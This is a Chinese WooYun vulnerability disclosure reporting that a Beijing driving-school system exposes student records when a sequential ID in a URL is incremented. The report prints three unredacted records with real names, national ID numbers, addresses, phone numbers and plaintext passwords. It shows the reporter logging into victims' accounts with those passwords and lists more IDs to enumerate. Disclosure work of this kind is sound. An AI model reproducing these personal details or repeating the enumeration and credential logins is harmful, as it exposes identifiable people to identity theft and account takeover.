当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156053

漏洞标题:北京某驾驶系统接口安全漏洞导致上万用户+身份证+密码+出生年月+住址泄漏

相关厂商:北京某驾驶系统

漏洞作者: 0x 80

提交时间:2015-11-26 16:30

修复时间:2016-01-14 16:02

公开时间:2016-01-14 16:02

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

北京某驾驶系统接口安全漏洞导致敏感信息泄露(上万用户+身份证信息+密码+出生年月+住址+学车信息)
PS:用户的身份信息,一目了然
还是源代码问题

详细说明:

http://**.**.**.**
登陆口
这里出现问题了
http://**.**.**.**:8008/student/studyinfo?xxzh=51189710

99991.jpg


看看

{ "data": { "_ST_IDCARD": "372922198702024816", "_SSFY": null, "ST_NO": "1180041421", "ST_ID": "51189710", "ST_NAME": "宋崇显", "ST_SEX": "0", "ST_BIRTHDAY": "1987/02/02 00:00:00", "ST_ADDR": "山东省曹县侯集回族镇宋堂行政村宋堂村119号", "LXDZ": "北京市海淀区双泉堡临288号210号", "ST_IDCARD": "372922198702024816", "ST_OTCARD": "0805201451467175", "ST_PHONE": null, "DH1": "", "DH2": "", "JGID": "118001", "JGIDS": "118001", "ST_HANDSET": "15801541129", "ST_MAILCARD": "100089 ", "ST_LINKMAN": "", "ST_LINKMANP": "", "ST_HIGH": "", "ST_CKIND": "C", "ST_CTYPE": "C20", "ST_LEADCARDDATE": "2014/03/26 00:00:00", "ST_EXAMMARKER": null, "ST_OLDCARTYPE": "", "ST_ZONECODE": "", "SC_ID": null, "ST_SIGN": "1", "ST_ISRECEIVECARD": "", "ST_BESPEAKSIGN": "", "ST_PVDATE": "0001/01/01 00:00:00", "ST_EXITSIGN": "", "ST_PWD": "870202", "ST_CLASSSIGN": "11800010", "ST_CLASSSName": "团体1-7直通车", "ST_ROADID": null, "U_DATE": "0001/01/01 00:00:00", "C_DATE": "0001/01/01 00:00:00", "LXXZRQ": "2014/03/26 00:00:00", "YXQ": "2017-03-26", "IF_ROADID": null, "BMD": "", "BMD2": null, "BMF2": 0.0, "JL": null, "BMF": "4560", "BMFTYPE": "1", "BMRQ": "2014/03/07 00:00:00", "BZ": "", "BMTBMAN": "ydbm", "ZHLB": "居民身份证", "Count_Number": null, "DABH": "", "ZHLB2": "暂住证", "SQCX": "C20", "SQCXNAME": "爱丽舍", "JXNAME": "远大驾校", "JGSZM": null, "CNBH": "", "ZJCX": "", "SFNUM": null, "FPSJ": "2014-03-15", "FPZ": null, "SSFY": "0", "PNum": null, "LWZC": "", "XYLY": "", "cheSFZ": null, "cheZZZ": null, "cheJSZ": null, "cheJGZ": null, "cheZMX": null, "cheHZ": null, "cheHXZ": null, "cheTXZ": null, "cheTBZ": null, "cheWJZ": null, "cheJLZ": null, "cheQT": null, "SCSX": null, "BZNAME": null, "XXZT": null, "SSSJ": "0001/01/01 00:00:00", "opDBZZZ": null, "selxyWL": null, "txtXYBH2": null, "STAUTS": "521", "STAUTSNAME": "", "XYZH": null, "XLXSS": "50", "YYWLXSS": "0", "SYXSS": "0", "ZFXSS": "0", "GMXSS": "50", "XJBJ": "0", "XYBMD": "远大", "YZCODE": "", "YZCODENAME": null, "BZMC": null, "ST_CTYPENAME": "爱丽舍", "ZSR": "", "ST_PXLX": "", "ST_PXLXNAME": "", "IS2FP": "0", "SFCWSH": "1", "ZDRQDISPLAY": "", "FPJSNAME": null, "FPZWH": null, "SFZX": 0, "lMONEY": null, "XH": null, "FCJL": null, "XXZH": null, "SKDD": null, "SFTX": null, "FPH": null, "CSDATE": "0001/01/01 00:00:00", "SFJQXF": null, "FGXLLX": null, "IFJDWZCF": 0, "SFJMXF": null, "SFDSLQTC": null, "YTJE": null, "SFSMSF": null, "JSRXKH": null, "SFKTWLYC": "", "KM3CNBH": "" }, "code": 0, "message": "" }


或许我们最想要的东西
首先我们把关键的找出来
372922198702024816", "_SSFY": null, "ST_NO": "1180041421", "ST_ID": "51189710", "ST_NAME": "宋崇显", "ST_SEX": "0", "ST_BIRTHDAY": "1987/02/02 00:00:00", "ST_ADDR": "山东省曹县侯集回族镇宋堂行政村宋堂村119号", "LXDZ": "北京市海淀区双泉堡临288号210号"
很明显了
用户:372922198702024816
密码:ST_PWD": "870202"
登陆看看
由于有防火墙,我换台服务器试试

9111.jpg


一目了然

姓名:  宋崇显  性别:  男  
身份证号: 372922198702024816 学习证号: 51189710
出生日期: 1987-2-2 联系电话: 15801541129
报名班型: 团体1-7直通车 报名车型: 爱丽舍
报名时间: 2014-3-7 有效期: 2017-3-7


这个地址http://**.**.**.**:8008/student/studyinfo?xxzh=51189710
xxzh没有任何任何加密,危害就大了,替换+1逻辑就是上万数据了
http://**.**.**.**:8008/student/studyinfo?xxzh=51189711

912.jpg


{ "data": { "_ST_IDCARD": "513723199504140426", "_SSFY": null, "ST_NO": "1180042017", "ST_ID": "51189711", "ST_NAME": "杜洁", "ST_SEX": "1", "ST_BIRTHDAY": "1995/04/14 00:00:00", "ST_ADDR": "四川省平昌县江口镇国光村14社21号", "LXDZ": "北京市海淀区半壁店23号院9号楼121号", "ST_IDCARD": "513723199504140426", "ST_OTCARD": "0819201451704940", "ST_PHONE": null, "DH1": "苏晓丽代约", "DH2": "", "JGID": "118001", "JGIDS": "118001", "ST_HANDSET": "15810875131", "ST_MAILCARD": "100089 ", "ST_LINKMAN": "", "ST_LINKMANP": "", "ST_HIGH": "", "ST_CKIND": "C", "ST_CTYPE": "C20", "ST_LEADCARDDATE": "2014/04/12 00:00:00", "ST_EXAMMARKER": null, "ST_OLDCARTYPE": "", "ST_ZONECODE": "", "SC_ID": null, "ST_SIGN": "1", "ST_ISRECEIVECARD": "", "ST_BESPEAKSIGN": "", "ST_PVDATE": "0001/01/01 00:00:00", "ST_EXITSIGN": "", "ST_PWD": "950414", "ST_CLASSSIGN": "10000002", "ST_CLASSSName": "普通1-7", "ST_ROADID": null, "U_DATE": "0001/01/01 00:00:00", "C_DATE": "0001/01/01 00:00:00", "LXXZRQ": "2014/04/12 00:00:00", "YXQ": "2017-04-12", "IF_ROADID": null, "BMD": "", "BMD2": null, "BMF2": 0.0, "JL": null, "BMF": "4560", "BMFTYPE": "1", "BMRQ": "2014/03/11 00:00:00", "BZ": "", "BMTBMAN": "ydbm", "ZHLB": "居民身份证", "Count_Number": null, "DABH": "", "ZHLB2": "暂住证", "SQCX": "C20", "SQCXNAME": "爱丽舍", "JXNAME": "远大驾校", "JGSZM": null, "CNBH": "", "ZJCX": "", "SFNUM": null, "FPSJ": "2014-03-15", "FPZ": null, "SSFY": "0", "PNum": null, "LWZC": "0", "XYLY": "", "cheSFZ": null, "cheZZZ": null, "cheJSZ": null, "cheJGZ": null, "cheZMX": null, "cheHZ": null, "cheHXZ": null, "cheTXZ": null, "cheTBZ": null, "cheWJZ": null, "cheJLZ": null, "cheQT": null, "SCSX": null, "BZNAME": null, "XXZT": null, "SSSJ": "0001/01/01 00:00:00", "opDBZZZ": null, "selxyWL": null, "txtXYBH2": null, "STAUTS": "421", "STAUTSNAME": "科目三满小时", "XYZH": null, "XLXSS": "50", "YYWLXSS": "0", "SYXSS": "0", "ZFXSS": "0", "GMXSS": "50", "XJBJ": "0", "XYBMD": "远大", "YZCODE": "", "YZCODENAME": null, "BZMC": null, "ST_CTYPENAME": "爱丽舍", "ZSR": "", "ST_PXLX": "", "ST_PXLXNAME": "", "IS2FP": "0", "SFCWSH": "1", "ZDRQDISPLAY": "", "FPJSNAME": null, "FPZWH": null, "SFZX": 0, "lMONEY": null, "XH": null, "FCJL": null, "XXZH": null, "SKDD": null, "SFTX": null, "FPH": null, "CSDATE": "0001/01/01 00:00:00", "SFJQXF": null, "FGXLLX": null, "IFJDWZCF": 0, "SFJMXF": null, "SFDSLQTC": null, "YTJE": null, "SFSMSF": null, "JSRXKH": null, "SFKTWLYC": "", "KM3CNBH": "" }, "code": 0, "message": "" }


用户513723199504140426
密码 950414
登陆看看

9119911.jpg


一目了然

99981.jpg


**.**.**.**:8008/student/studyinfo?xxzh=51189713

{ "data": { "_ST_IDCARD": "321321198312092419", "_SSFY": null, "ST_NO": "1180041966", "ST_ID": "51189713", "ST_NAME": "吴彬", "ST_SEX": "0", "ST_BIRTHDAY": "1983/12/09 00:00:00", "ST_ADDR": "江苏省宿迁市宿豫区顺河镇蔡庄居委会一组20号", "LXDZ": "北京市海淀区挂甲屯18号101号", "ST_IDCARD": "321321198312092419", "ST_OTCARD": "0802201451343610", "ST_PHONE": null, "DH1": "", "DH2": "", "JGID": "118001", "JGIDS": "118001", "ST_HANDSET": "13261182923", "ST_MAILCARD": "100089 ", "ST_LINKMAN": "", "ST_LINKMANP": "", "ST_HIGH": "", "ST_CKIND": "C", "ST_CTYPE": "C24", "ST_LEADCARDDATE": "2014/03/26 00:00:00", "ST_EXAMMARKER": null, "ST_OLDCARTYPE": "", "ST_ZONECODE": "", "SC_ID": null, "ST_SIGN": "1", "ST_ISRECEIVECARD": "", "ST_BESPEAKSIGN": "", "ST_PVDATE": "0001/01/01 00:00:00", "ST_EXITSIGN": "", "ST_PWD": "wubin4283319", "ST_CLASSSIGN": "11800010", "ST_CLASSSName": "团体1-7直通车", "ST_ROADID": null, "U_DATE": "0001/01/01 00:00:00", "C_DATE": "0001/01/01 00:00:00", "LXXZRQ": "2014/03/26 00:00:00", "YXQ": "2017-03-26", "IF_ROADID": null, "BMD": "", "BMD2": null, "BMF2": 0.0, "JL": null, "BMF": "4560", "BMFTYPE": "1", "BMRQ": "2014/03/07 00:00:00", "BZ": "", "BMTBMAN": "ydbm", "ZHLB": "居民身份证", "Count_Number": null, "DABH": "", "ZHLB2": "暂住证", "SQCX": "C24", "SQCXNAME": "富康", "JXNAME": "远大驾校", "JGSZM": null, "CNBH": "", "ZJCX": "", "SFNUM": null, "FPSJ": "2014-03-15", "FPZ": null, "SSFY": "0", "PNum": null, "LWZC": "0", "XYLY": "", "cheSFZ": null, "cheZZZ": null, "cheJSZ": null, "cheJGZ": null, "cheZMX": null, "cheHZ": null, "cheHXZ": null, "cheTXZ": null, "cheTBZ": null, "cheWJZ": null, "cheJLZ": null, "cheQT": null, "SCSX": null, "BZNAME": null, "XXZT": null, "SSSJ": "0001/01/01 00:00:00", "opDBZZZ": null, "selxyWL": null, "txtXYBH2": null, "STAUTS": "521", "STAUTSNAME": "", "XYZH": null, "XLXSS": "50", "YYWLXSS": "0", "SYXSS": "0", "ZFXSS": "0", "GMXSS": "0", "XJBJ": "0", "XYBMD": "远大", "YZCODE": "", "YZCODENAME": null, "BZMC": null, "ST_CTYPENAME": "富康", "ZSR": "", "ST_PXLX": "", "ST_PXLXNAME": "", "IS2FP": "0", "SFCWSH": "1", "ZDRQDISPLAY": "", "FPJSNAME": null, "FPZWH": null, "SFZX": 0, "lMONEY": null, "XH": null, "FCJL": null, "XXZH": null, "SKDD": null, "SFTX": null, "FPH": null, "CSDATE": "0001/01/01 00:00:00", "SFJQXF": null, "FGXLLX": null, "IFJDWZCF": 0, "SFJMXF": null, "SFDSLQTC": null, "YTJE": null, "SFSMSF": null, "JSRXKH": null, "SFKTWLYC": "", "KM3CNBH": "" }, "code": 0, "message": "" }


321321198312092419


wubin4283319


9999913.jpg


测试了3个,由于数据太多就不一一试了

漏洞证明:

**.**.**.**:8008/student/studyinfo?xxzh=51189713


**.**.**.**:8008/student/studyinfo?xxzh=51189714
**.**.**.**:8008/student/studyinfo?xxzh=51189715
**.**.**.**:8008/student/studyinfo?xxzh=51189716
+1逻辑,查询上万数据
登陆即可~~

修复方案:

过滤,权限控制

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-30 16:01

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无


漏洞评价:

评价